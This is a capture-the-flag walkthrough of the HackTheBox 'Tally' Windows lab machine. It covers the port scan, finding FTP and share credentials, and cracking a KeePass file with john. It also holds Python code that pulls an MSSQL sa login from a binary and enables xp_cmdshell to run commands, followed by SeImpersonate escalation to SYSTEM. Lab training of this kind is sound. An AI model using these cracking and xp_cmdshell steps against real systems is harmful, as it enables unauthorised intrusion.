Basic information

Port scan

The usual Windows ports are open (the NTLM product version 10.0.14393 identifies Windows Server 2016, whatever the older SMB-based OS guess says):

$ nmap -sC -sV 10.10.10.59

Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-25 14:09 CST
Nmap scan report for 10.10.10.59
Host is up (0.065s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-08-25T06:07:42
|_Not valid after: 2051-08-25T06:07:42
|_ssl-date: 2021-08-25T06:10:08+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-25T06:09:55
|_ start_date: 2021-08-25T06:07:24
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.55 seconds

Port 80

SharePoint:


Browsing the standard SharePoint document libraries turns up a document that contains the FTP password:

Switching the site to mobile view and browsing its contents also reveals a Finance Team page, which gives the FTP username:


FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

FTP

Logging in to FTP yields a KeePass database:

/User/Tim/Files/tim.kdbx; another text file on the share also hints that passwords are kept in it.


Cracking the KeePass master password:

keepass2john tim.kdbx
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da

# save the line above as hash.txt, then run john against it
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
simplementeyo (tim)
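To make clear what john is actually attacking here, the following parser (an added example for this writeup, not code from the page or from john) splits the `$keepass$` line shown above into its fields and estimates the AES work per password guess. `HASH_LINE` is copied verbatim from the output above; the field names and the `aes_blocks_per_guess` model are my own labels for the KDBX 2.x AES-KDF layout.

```python
"""Parse the $keepass$*2* line keepass2john emits for a KDBX 2.x database."""
from typing import Dict

# Copied verbatim from the keepass2john output in this writeup.
HASH_LINE = ("tim:$keepass$*2*6000*0*"
             "f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*"
             "3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*"
             "3f759d7011f43b30679a5ac650991caa*"
             "b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*"
             "535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da")

# Hex fields after "$keepass$*2*<rounds>*<offset>*", in order, with their
# byte lengths in the KDBX 2.x (AES-KDF) header layout.
FIELD_LENGTHS = {
    "master_seed": 32,     # hashed together with the transformed key -> master key
    "transform_seed": 32,  # AES-256 key used for the key-transformation rounds
    "enc_iv": 16,          # CBC IV for the encrypted payload
    "expected_start": 32,  # plaintext that the first 32 payload bytes must decrypt to
    "first_block": 32,     # first 32 bytes of ciphertext (all a cracker needs)
}


def parse_keepass_hash(line: str) -> Dict[str, object]:
    """Return the user, KDF rounds and the raw header fields of a KDBX 2.x hash line.

    Raises ValueError on a malformed line or a field of the wrong length, so a
    truncated or hand-edited hash is caught before it is handed to a cracker."""
    user, _, hash_part = line.partition(":")
    parts = hash_part.split("*")
    if len(parts) != 9 or parts[0] != "$keepass$" or parts[1] != "2":
        raise ValueError("not a KDBX 2.x $keepass$ hash line")
    fields: Dict[str, object] = {
        "user": user,
        "version": 2,
        "rounds": int(parts[2]),   # AES-KDF transform rounds (6000 here)
        "offset": int(parts[3]),   # offset field carried by the format (0 here)
    }
    for name, hexval in zip(FIELD_LENGTHS, parts[4:]):
        raw = bytes.fromhex(hexval)
        if len(raw) != FIELD_LENGTHS[name]:
            raise ValueError(f"{name}: expected {FIELD_LENGTHS[name]} bytes, got {len(raw)}")
        fields[name] = raw
    return fields


def aes_blocks_per_guess(rounds: int) -> int:
    """AES block operations a cracker spends per candidate password.

    AES-KDF encrypts each 16-byte half of the 32-byte composite key `rounds`
    times with AES-256 under transform_seed, then the guess is verified by
    decrypting just two CBC blocks (first_block) and comparing them with
    expected_start. Nothing else in the database has to be touched."""
    return 2 * rounds + 2


if __name__ == "__main__":
    h = parse_keepass_hash(HASH_LINE)
    print(h["user"], h["rounds"], "rounds ->", aes_blocks_per_guess(h["rounds"]), "AES blocks/guess")
```

The point the numbers make: 6000 transform rounds is KeePass 2's long-standing default, so each guess costs only about 12,000 AES block operations, and the 32 expected start bytes give the cracker an exact yes/no oracle without decrypting the rest of the file. That is why a rockyou run against this database finishes quickly.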

The database holds the password for the Finance share:

Finance:Acc0unting

do to.txt

/User/Tim/Project/Log/do to.txt

To do:

Remove migration folder
Set secure share permissions

encrypted share creds:

password in keepass

SMB

The recovered Finance credentials give access to SMB:

The database connection details are found inside /zz_Migration/Binaries/New folder/tester.exe:

DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

MSSQL & user flag

With the sa login on MSSQL, the usual route to command execution gives a shell as the user Sarah; user.txt is on her desktop:
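A worked example of the last two steps, added for this writeup and not code from the page or from the Tally box: pull the ODBC connection string out of a Windows binary the way `strings -el` would (Win32/.NET binaries usually store string literals as UTF-16LE, which plain `strings` misses), parse it into connection parameters, and use the recovered `sa` login to run commands through xp_cmdshell. The `SAMPLE_BINARY` bytes are constructed; only the connection string inside them is the one recovered above. `pymssql` and the xp_cmdshell route are my assumptions; the page itself only says the shell was obtained the usual way.

```python
"""Recover an ODBC connection string from a binary and turn it into an MSSQL shell."""
import re
from typing import Dict, List

# The connection string recovered from tester.exe in this writeup.
CONN = ("DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;"
        "UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;")

# Constructed stand-in for tester.exe: a PE-like prefix with an ASCII string,
# the connection string as a UTF-16LE literal (how .NET stores it), and junk.
SAMPLE_BINARY = (b"MZ\x90\x00\x03\x00\x00\x00"
                 + b"This program cannot be run in DOS mode.\r\n$"
                 + b"\x00" * 16
                 + CONN.encode("utf-16-le") + b"\x00\x00"
                 + b".text\x00\x00\x00" + b"\xff" * 8)


def extract_strings(blob: bytes, min_len: int = 8) -> List[str]:
    """Printable runs found as ASCII or as UTF-16LE (roughly `strings -a -el`)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in utf16_re.finditer(blob)]
    return found


def find_connection_strings(blob: bytes) -> List[str]:
    """Keep only strings that look like ODBC/ADO connection strings."""
    key_re = re.compile(r"\b(UID|PWD|SERVER|DATABASE)=", re.I)
    return [s for s in extract_strings(blob) if key_re.search(s)]


def parse_odbc(conn: str) -> Dict[str, str]:
    """Split 'KEY=value;KEY={value};' into a dict (keys upper-cased, braces stripped).

    Splits on the first '=' only, since values such as base64 may contain '='.
    Values containing a literal ';' would need real brace-aware parsing."""
    out: Dict[str, str] = {}
    for part in conn.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        value = value.strip()
        if value.startswith("{") and value.endswith("}"):
            value = value[1:-1]
        out[key.strip().upper()] = value
    return out


def to_mssql_params(conn: str) -> Dict[str, object]:
    """Map the ODBC fields to what a client library needs; 'HOST, PORT' is split."""
    kv = parse_odbc(conn)
    host, _, port = kv["SERVER"].partition(",")
    return {"server": host.strip(), "port": int(port.strip() or 1433),
            "user": kv["UID"], "password": kv["PWD"],
            "database": kv.get("DATABASE", "master")}


# sysadmin (which sa is) can switch xp_cmdshell on through sp_configure.
XP_CMDSHELL_ENABLE = [
    "EXEC sp_configure 'show advanced options', 1;",
    "RECONFIGURE;",
    "EXEC sp_configure 'xp_cmdshell', 1;",
    "RECONFIGURE;",
]


def xp_cmdshell_sql(cmd: str) -> str:
    """T-SQL to run cmd; single quotes are doubled so cmd cannot break the literal."""
    return "EXEC master..xp_cmdshell '%s';" % cmd.replace("'", "''")


def run_xp_cmdshell(params: Dict[str, object], cmd: str, timeout: int = 30) -> List[str]:
    """Connect with the recovered login and return xp_cmdshell's output lines.

    pymssql (assumption: `pip install pymssql`) is imported here so the parsing
    functions above still work without it."""
    import pymssql
    conn = pymssql.connect(server=str(params["server"]), port=str(params["port"]),
                           user=str(params["user"]), password=str(params["password"]),
                           database=str(params["database"]), login_timeout=timeout)
    conn.autocommit(True)  # keep sp_configure/RECONFIGURE out of an open transaction
    cur = conn.cursor()
    for stmt in XP_CMDSHELL_ENABLE:
        cur.execute(stmt)
    cur.execute(xp_cmdshell_sql(cmd))
    return [row[0] for row in cur.fetchall() if row[0] is not None]


if __name__ == "__main__":
    for found in find_connection_strings(SAMPLE_BINARY):
        print(found)
        print(to_mssql_params(found))
```

Usage against the real target would be `run_xp_cmdshell(to_mssql_params(CONN), "whoami")`; the output is the account the SQL Server service runs as, which here is Sarah.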

Privilege escalation enumeration

Checking the token privileges shows SeImpersonatePrivilege:

Privilege escalation & root flag

A Potato-family exploit abusing SeImpersonatePrivilege escalates straight to SYSTEM; root.txt is on the Administrator desktop:

References